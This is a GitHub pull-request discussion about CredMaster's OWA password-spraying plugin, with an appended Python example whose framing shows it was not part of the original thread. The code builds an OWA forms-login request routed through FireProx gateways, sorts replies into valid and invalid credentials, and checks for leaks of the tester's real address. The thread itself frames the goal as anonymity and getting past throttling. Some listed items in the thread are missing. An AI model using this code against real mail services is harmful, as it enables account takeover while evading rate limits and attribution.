knavesec / CredMaster

Refactored & improved CredKing password spraying tool, uses FireProx APIs to rotate IP addresses, stay anonymous, and beat throttling
926 stars, 120 forks

update owa plugin to use forms auth #42

Open techspence opened 1 year ago

techspence commented 1 year ago

TLDR: This PR seeks to resolve the issue "OWA/EWS Plugins Authentication Failed with Valid Credentials" by changing the owa plugin to use forms auth instead of NTLM against the auto-discover endpoint.

Note: There are a couple of opsec drawbacks with this, but for the purposes of testing a client environment, I'm personally ok with those drawbacks.

Summary of changes:

Strange behavior:

I've tested this a bit in my lab, but I would very much welcome others testing this to see if I've introduced any bugs/issues/incompatibilities/etc. If there's anything that requires fixing I'm happy to work on it.

I hope this PR can help the project even just a tiny bit. Cheers!

knavesec commented 1 year ago

Apologies for the 6mo wait

I like and appreciate the work you did for this, but the goal of this tool is to remain as opsec-conscious as possible. If you're able to find ways to abuse these services through FireProx I'd be happy to merge, but I can't knowing there would be leaks. I do agree we're testing verified client environments, but leaking any infrastructure is a dealbreaker.

techspence commented 1 year ago

I definitely understand the opsec requirements. I appreciate you reviewing the PR. If I can find a way to do this while meeting your requirements I will send another PR.

knavesec commented 1 year ago

From what I'm seeing, there are 3 places where there is a leak:

Idk, it doesn't seem like it uses the FireProx APIs at all, unless I'm mistaken. At that point you could just use the Metasploit module or something that's better tried and tested.
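The two points the thread turns on are the forms-auth request itself (the PR description above) and the requirement that nothing in that request path ever touches the real Exchange host directly (the maintainer's leak concern). The following is an added example, not CredMaster's code, the PR's code, or the Metasploit module: it builds the OWA forms login as a FireProx-routed request without sending it, classifies an un-followed response, and flags any URL that would bypass the gateway. The gateway URL, hostnames, credentials, and the helper names (`through_proxy`, `build_owa_forms_login`, `classify_response`, `find_leaks`) are all constructed for illustration; the form field names and the success/failure signals are what OWA's own logon page and the Metasploit `owa_login` module use, but are stated here as assumptions rather than as anything this PR verified.

```python
"""Added example: an opsec check for a FireProx-routed OWA forms-auth probe.

Not CredMaster's or the PR's code. Every name below is hypothetical.
"""
from urllib.parse import urlencode, urlparse, parse_qs

# Constructed sample gateway URL (not real infrastructure).
PROXY_BASE = "https://abcd1234.execute-api.us-east-1.amazonaws.com/fireprox/"


def through_proxy(path, proxy_base=PROXY_BASE):
    """Map a target-relative path onto the FireProx gateway URL.

    Assumption about FireProx: <gateway>/fireprox/<path> is forwarded to
    <target>/<path>, so the client never needs the real hostname once the
    gateway has been created for the target.
    """
    return proxy_base.rstrip("/") + "/" + path.lstrip("/")


def build_owa_forms_login(username, password, proxy_base=PROXY_BASE):
    """Return (url, headers, body) for an OWA forms-based login POST.

    The fields mirror what OWA's logon page submits to /owa/auth.owa.
    'destination' is the post-login redirect target; pointing it at the
    gateway keeps the server's 302 Location on the gateway host too, which
    is one of the places a real hostname would otherwise leak into.
    """
    url = through_proxy("/owa/auth.owa", proxy_base)
    fields = {
        "destination": through_proxy("/owa/", proxy_base),
        "flags": "4",
        "forcedownlevel": "0",
        "username": username,
        "password": password,
        "passwordText": "",
        "isUtf8": "1",
    }
    headers = {"Content-Type": "application/x-www-form-urlencoded"}
    # The caller must send this with redirects disabled; a client that
    # auto-follows a Location pointing at the real host leaks its own IP.
    return url, headers, urlencode(fields)


def classify_response(status, location, cookies):
    """Classify an un-followed auth.owa response.

    Assumed OWA behaviour: success is a 302 that sets the 'cadata' session
    cookie; a 302 back to logon.aspx with reason=2 means bad credentials.
    Anything else is 'unknown' so the caller logs it instead of guessing.
    """
    if status == 302 and location:
        if "cadata" in cookies:
            return "valid"
        loc = urlparse(location)
        if loc.path.lower().endswith("/owa/auth/logon.aspx") and \
                parse_qs(loc.query).get("reason") == ["2"]:
            return "invalid"
    return "unknown"


def find_leaks(urls, proxy_base=PROXY_BASE):
    """Return every URL whose host is not the FireProx gateway.

    Run this over the request URL and over any Location header before
    deciding whether to follow it; a non-empty result means a direct hit
    on client infrastructure from the tester's real address.
    """
    gateway = urlparse(proxy_base).netloc.lower()
    return [u for u in urls if urlparse(u).netloc.lower() != gateway]


if __name__ == "__main__":
    url, headers, body = build_owa_forms_login("alice@example.com", "Winter2024!")
    print("POST", url)
    print(body)
    # A constructed failure redirect that names the real host: flagged.
    print(find_leaks([url, "https://mail.example.com/owa/auth/logon.aspx?reason=2"]))
```

The design point is that the leak check is separate from the login logic: whether the plugin authenticates with NTLM or forms auth, the only thing the gateway guarantees is the host of the URLs the client chooses to contact, so redirects and any URL embedded in the form body have to be audited by the client rather than trusted. The classification works on the raw 302 precisely so that no redirect is ever followed automatically.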